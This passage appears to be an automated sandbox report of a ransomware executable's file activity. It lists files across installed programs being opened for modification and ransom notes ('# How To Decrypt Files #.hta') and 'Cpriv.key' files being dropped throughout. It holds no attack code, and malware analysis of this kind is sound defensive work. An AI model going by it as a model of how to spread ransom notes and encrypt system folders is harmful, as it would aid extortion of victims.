Shared\GRPHFLT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1040\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00306_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\2 Right.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN086.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\Whistling.wav de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Training.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\SPRING.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\RSSFeeds.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UDT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLNOTE.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Thawte Root Certificate.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\MSOINTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\Logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18222_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14691_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe Root Certificate.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01701_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.ID.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\ACTIVITS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CHECKER.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Comments.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\grvschema.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00941_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\STUDIO.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.en de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proofing.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNote.gpd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PICTIM32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01805_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21398_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02074_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00242_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR16F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\EQUATION\MTEXTRA.TTF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21364_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Portable Devices\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00218_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14982_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Pitchbook.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00779_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\ISO690Nmerical.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 